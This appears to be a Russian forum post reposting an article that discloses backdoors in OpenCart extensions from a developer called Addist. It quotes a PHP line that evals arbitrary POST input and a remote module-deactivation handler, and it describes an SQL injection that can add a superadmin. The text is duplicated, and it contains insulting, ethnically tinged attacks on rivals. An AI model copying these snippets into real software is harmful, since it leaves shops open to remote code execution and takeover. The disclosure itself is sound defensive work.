- Joined
- Nov 25, 2015
- Messages
- 11,031
- Reaction score
- 1,365
У Лукоморья дуб зеленый…
Другого названия происходящему, у меня придумать не получилось.
Я вас никогда не просил сделать репосты, и распространить информацию.
Это первый и надеюсь последний раз по такому поводу, но я вас убедительно прошу, мои дорогие читатели, друзья, враги, хейтеры.
Распространите эту статью максимально по своим знакомым у которых есть магазины на Opencart.
Только в моем контакт листе в скайпе из 200 человек, 10 нашли у себя эту заразу.
Попробую достаточно подробно описать вам всю ситуацию с уязвимостью в дополнениях от Addist и выразить свои догадки, почему так произошло и что делать, чтобы подобная ситуация не повторилась.
Небольшая предыстория. Три дня назад мне в личку прислали файлы модуля от Addist, в которых оказалась целая гора сюрпризов.
1 Самый явный — это:
2 Кроме этого:
3 И еще
Для тех кто ничего не понимает в программировании, объясню на пальцах:
1. Код позволяет на вашем сервере выполнить любую команду при помощи функции eval(). Грубо говоря, если у вас стоит дополнение Addist, то получить ftp вашего магазина — это 5 секунд времени. Сделал это аддист специально, или случайно — не важно. Факт в том что такие модули обнаружились у почти 1000 владельцев работающих магазинов. Как я предполагал.
2. Во втором примере, господин Мумтоз, как называет себя Аддист, вставил инструмент, который позволяет включать-отключать его модуль также извне удаленной командой на сверер. Но то что при помощи этой конструкции можно заебать владельца магазина до смерти и отключать нон-стоп любые модули, про это аддист или не подумал. Или сделал так специально.
3. Ранее я писал про другие уязвимости в других дополнениях, Аддист болеет и этим — никакого экранирования данных передаваемых в базу, и если соответствующим образом составить данные, при помощи этой дыры можно сделать запрос в базу магазина к примеру добавить пользователя с правами суперадмина, ну а там уже перехватить полный доступ к магазину — тоже не проблема.
——————————————————————————————————————————————
После того, как я получил эту информацию, мы сделали скрипт проверки уязвимости, сделали заплатку для нее ну и я связался с Диноксом и с 19ым, для того чтобы уведомить всех покупателей и участников комьюнити о наличии данной уязвимости.
C нашего форума и с Liveopencart рассылка пошла сразу же. А вот с Opencartforumом возникла проблема, так как он оказался в стадии переноса, и сделать рассылку не получается до сих пор. Я все же надеюсь, что в течении следующей недели, они решат эту проблему и у нас получится охватить.
—————————————————————————————————————————————
Как я отношусь к этой ситуации.
Есть несколько аспектов, которые меня немного напрягают.
Как многие знают, все дополнения Addist были по непонятным причинам сняты с продажи на Opencartforum и на Liveopencart.
Но не всех война убила и есть еще опенкарт рашша. Основных персонажей, которые стоят за этим проектом я не знаю. Но и знать не хочу. Лично у меня есть для этого достаточно оснований.
1) Все вонючки с opencartforum, которым по каким то причинам стало там некомфортно, на ресурсах раши, чувствуют себя богами. Не будем тыкать пальцем, все всех знают.
2) Смешно Opencart Russia и в топе Равиль и Мумтоз, осталось позвать Равшан и Джамшут и будет Опенкарт Наша Раша, насяльника.
3) Среди топовых участников этого сообщества, есть несколько людей, устанавливающих клиентам варез, лично ловил за руку.
4) Эти талантливые во всех смыслах персонажи. Не сделали ничего кроме перевода. Все их сообщество держиться сугубо на переводе Opencart на русский язык.
Им некошерно использовать seo_pro для модификации ссылок, они даже не знают что это и зачем. Им некошерно делать уникальные Мета заголовки h1 и title.
Вместо того чтобы перенять опыт и взять лучшее от сообщества OcStore, или у нас. Они пошли своим тупорылым путем.
И вот эта тупорылость, недальновидность, глупость хозеяв сообщества ОпенкартНашаРаша — и это я мягко выражаюь, привела к тому что, в их «типа сборке» отсуствует нормальное seo. Соответственно, вместо того чтобы взять seo-pro от rb2 и любой генератор мета-тегов, они пригрели у себя Аддиста, которого погнали ссаными тряпками отовсюду. И им было хорошо. Модули Addist закрывали проблемы с seo, хозяева Нашей Раши зарабатывали комиссию на продаже дополнений, функционал, которых рядом лежит бесплатно, и по качеству реализации на порядок круче.
После обнаружения уязвимости. Мумтоз начал бегать как ужаленный в жопу. И плакать на всех ресурсах, что его взломали, что он не виновен. Это не его код. И с него требуют 50 000 рублей, за то, чтобы «потихому» замять эту ситуацию. А также он сообщил, что устранил на каком то количестве магазинов свою дыру, через ту же дыру.
Лично я не верю ни одному слову. Так как:
1. Мумтоз не предоставил доказательств фактов взлома.
2. По его словам он закрыл уязвимость первого типа, но я вам привел еще две, и третьего типа проблема осталась, ваши магазины все еще под угрозой.
3. Я провел небольшое личное расследование. Модули с уязвимостью у некоторых моих подопечных были куплены более года назад, для разных версий движка и на разных площадках. Чтобы не быть голословным, помните статью про битву упырей. Она написана 6 мая 2016 года. Олег купил у него модуль, в апреле. Мы подняли архив с этим модулем. Уже тогда в нем есть все вышеописанные дыры. Я не верю, что 7 месяцев, Аддист не мог не замечать, что с его сервера распространяется дырявый код.
4. Будучи не самым плохим программистом, Мумтоз, сознательно использовал небезопасные приемы и реализации, зная, что ставит под удар чужие проекты.
Знаете. Я бы с удовольствием подискутировал и с Мумтозом, и с Джамшутом и с Равшаном. И со всеми всеми, про то какой я плохой. Сколько мне заплатили за эти статьи, чтобы замочить Аддиста и Нашу Рашу, почему я раньше костерил по чем свет Динокса и его форум, а теперь перестал, почему я пиарю Liveopencart, а не пиарю Динокса и еще про массу тайн интриг и расследований. Но я не хочу. Вы там уж сами за моей спиной, думаю справитесь. Все что вам в голову взбредет, говорю сразу — это правда. Так и думайте, так и есть. Йода — средоточие зла, интриган, хам деспот и самодур.
Для всех остальных, если вам интересно мое мнение. Могу сказать просто.
Команда неудачников Нашей Раши, породила такое чудовищное явление как модули Аддиста в свободной продаже. В их оправдания я не верю. Если предположить всё-таки, что наша Маша громко плачет, и на самом деле брешет как сидорова коза, то ответственность за ситуацию абсолютно равнозначная. Как на самом Аддисте, так и на владельцах площадки Опенкарт Наша Раша.
Ну и опять же, если вам интересно мнение, что с этим делать скажу просто. Десятой дорогой обходить эту звероферму. Просто забыть адрес площадки Нашей Раши. А также я всем рекомендую УДАЛИТЬ ВСЕ ВСЕ ВСЕ ФАЙЛЫ МОДУЛЕЙ Addist и попросить у него манибек. Я даже не привожу здесь инструкции для htaccess, которыми мы блокировали всем эту дыру. Просто удаляйте модули без разбирательств. Так как просто беглым просмотром нашлось вместо одной дыры целых три.
И ребят, обычно я всегда каким то образом даю однозначные рекомендации, советы. В данной ситуации все вышенаписанное — это мое личное мнение! Я не настаиваю, чтобы вы к нему прислушивались, я ни в коем случае не призываю вас переходить на мою сторону, становиться моим фанатом, последователем, разделять мои мысли и идеи.
Я просто собрал в кучу ответы на вопросы, которые сыпятся на меня в личке и в комментариях к предыдущей статье.
Другого названия происходящему, у меня придумать не получилось.
Я вас никогда не просил сделать репосты, и распространить информацию.
Это первый и надеюсь последний раз по такому поводу, но я вас убедительно прошу, мои дорогие читатели, друзья, враги, хейтеры.
Распространите эту статью максимально по своим знакомым у которых есть магазины на Opencart.
Только в моем контакт листе в скайпе из 200 человек, 10 нашли у себя эту заразу.
Попробую достаточно подробно описать вам всю ситуацию с уязвимостью в дополнениях от Addist и выразить свои догадки, почему так произошло и что делать, чтобы подобная ситуация не повторилась.
Небольшая предыстория. Три дня назад мне в личку прислали файлы модуля от Addist, в которых оказалась целая гора сюрпризов.
1 Самый явный — это:
PHP:
@eval($this->request->post['command']);
PHP:
if (!empty($this->request->get['deactivate']))
{
$this->cache->delete($this->request->get['deactivate']);
$this->config->remove($this->request->get['deactivate']);
}
Для тех кто ничего не понимает в программировании, объясню на пальцах:
1. Код позволяет на вашем сервере выполнить любую команду при помощи функции eval(). Грубо говоря, если у вас стоит дополнение Addist, то получить ftp вашего магазина — это 5 секунд времени. Сделал это аддист специально, или случайно — не важно. Факт в том что такие модули обнаружились у почти 1000 владельцев работающих магазинов. Как я предполагал.
2. Во втором примере, господин Мумтоз, как называет себя Аддист, вставил инструмент, который позволяет включать-отключать его модуль также извне удаленной командой на сверер. Но то что при помощи этой конструкции можно заебать владельца магазина до смерти и отключать нон-стоп любые модули, про это аддист или не подумал. Или сделал так специально.
3. Ранее я писал про другие уязвимости в других дополнениях, Аддист болеет и этим — никакого экранирования данных передаваемых в базу, и если соответствующим образом составить данные, при помощи этой дыры можно сделать запрос в базу магазина к примеру добавить пользователя с правами суперадмина, ну а там уже перехватить полный доступ к магазину — тоже не проблема.
——————————————————————————————————————————————
После того, как я получил эту информацию, мы сделали скрипт проверки уязвимости, сделали заплатку для нее ну и я связался с Диноксом и с 19ым, для того чтобы уведомить всех покупателей и участников комьюнити о наличии данной уязвимости.
C нашего форума и с Liveopencart рассылка пошла сразу же. А вот с Opencartforumом возникла проблема, так как он оказался в стадии переноса, и сделать рассылку не получается до сих пор. Я все же надеюсь, что в течении следующей недели, они решат эту проблему и у нас получится охватить.
—————————————————————————————————————————————
Как я отношусь к этой ситуации.
Есть несколько аспектов, которые меня немного напрягают.
Как многие знают, все дополнения Addist были по непонятным причинам сняты с продажи на Opencartforum и на Liveopencart.
Но не всех война убила и есть еще опенкарт рашша. Основных персонажей, которые стоят за этим проектом я не знаю. Но и знать не хочу. Лично у меня есть для этого достаточно оснований.
1) Все вонючки с opencartforum, которым по каким то причинам стало там некомфортно, на ресурсах раши, чувствуют себя богами. Не будем тыкать пальцем, все всех знают.
2) Смешно Opencart Russia и в топе Равиль и Мумтоз, осталось позвать Равшан и Джамшут и будет Опенкарт Наша Раша, насяльника.
3) Среди топовых участников этого сообщества, есть несколько людей, устанавливающих клиентам варез, лично ловил за руку.
4) Эти талантливые во всех смыслах персонажи. Не сделали ничего кроме перевода. Все их сообщество держиться сугубо на переводе Opencart на русский язык.
Им некошерно использовать seo_pro для модификации ссылок, они даже не знают что это и зачем. Им некошерно делать уникальные Мета заголовки h1 и title.
Вместо того чтобы перенять опыт и взять лучшее от сообщества OcStore, или у нас. Они пошли своим тупорылым путем.
И вот эта тупорылость, недальновидность, глупость хозеяв сообщества ОпенкартНашаРаша — и это я мягко выражаюь, привела к тому что, в их «типа сборке» отсуствует нормальное seo. Соответственно, вместо того чтобы взять seo-pro от rb2 и любой генератор мета-тегов, они пригрели у себя Аддиста, которого погнали ссаными тряпками отовсюду. И им было хорошо. Модули Addist закрывали проблемы с seo, хозяева Нашей Раши зарабатывали комиссию на продаже дополнений, функционал, которых рядом лежит бесплатно, и по качеству реализации на порядок круче.
После обнаружения уязвимости. Мумтоз начал бегать как ужаленный в жопу. И плакать на всех ресурсах, что его взломали, что он не виновен. Это не его код. И с него требуют 50 000 рублей, за то, чтобы «потихому» замять эту ситуацию. А также он сообщил, что устранил на каком то количестве магазинов свою дыру, через ту же дыру.
Лично я не верю ни одному слову. Так как:
1. Мумтоз не предоставил доказательств фактов взлома.
2. По его словам он закрыл уязвимость первого типа, но я вам привел еще две, и третьего типа проблема осталась, ваши магазины все еще под угрозой.
3. Я провел небольшое личное расследование. Модули с уязвимостью у некоторых моих подопечных были куплены более года назад, для разных версий движка и на разных площадках. Чтобы не быть голословным, помните статью про битву упырей. Она написана 6 мая 2016 года. Олег купил у него модуль, в апреле. Мы подняли архив с этим модулем. Уже тогда в нем есть все вышеописанные дыры. Я не верю, что 7 месяцев, Аддист не мог не замечать, что с его сервера распространяется дырявый код.
4. Будучи не самым плохим программистом, Мумтоз, сознательно использовал небезопасные приемы и реализации, зная, что ставит под удар чужие проекты.
Знаете. Я бы с удовольствием подискутировал и с Мумтозом, и с Джамшутом и с Равшаном. И со всеми всеми, про то какой я плохой. Сколько мне заплатили за эти статьи, чтобы замочить Аддиста и Нашу Рашу, почему я раньше костерил по чем свет Динокса и его форум, а теперь перестал, почему я пиарю Liveopencart, а не пиарю Динокса и еще про массу тайн интриг и расследований. Но я не хочу. Вы там уж сами за моей спиной, думаю справитесь. Все что вам в голову взбредет, говорю сразу — это правда. Так и думайте, так и есть. Йода — средоточие зла, интриган, хам деспот и самодур.
Для всех остальных, если вам интересно мое мнение. Могу сказать просто.
Команда неудачников Нашей Раши, породила такое чудовищное явление как модули Аддиста в свободной продаже. В их оправдания я не верю. Если предположить всё-таки, что наша Маша громко плачет, и на самом деле брешет как сидорова коза, то ответственность за ситуацию абсолютно равнозначная. Как на самом Аддисте, так и на владельцах площадки Опенкарт Наша Раша.
Ну и опять же, если вам интересно мнение, что с этим делать скажу просто. Десятой дорогой обходить эту звероферму. Просто забыть адрес площадки Нашей Раши. А также я всем рекомендую УДАЛИТЬ ВСЕ ВСЕ ВСЕ ФАЙЛЫ МОДУЛЕЙ Addist и попросить у него манибек. Я даже не привожу здесь инструкции для htaccess, которыми мы блокировали всем эту дыру. Просто удаляйте модули без разбирательств. Так как просто беглым просмотром нашлось вместо одной дыры целых три.
И ребят, обычно я всегда каким то образом даю однозначные рекомендации, советы. В данной ситуации все вышенаписанное — это мое личное мнение! Я не настаиваю, чтобы вы к нему прислушивались, я ни в коем случае не призываю вас переходить на мою сторону, становиться моим фанатом, последователем, разделять мои мысли и идеи.
Я просто собрал в кучу ответы на вопросы, которые сыпятся на меня в личке и в комментариях к предыдущей статье.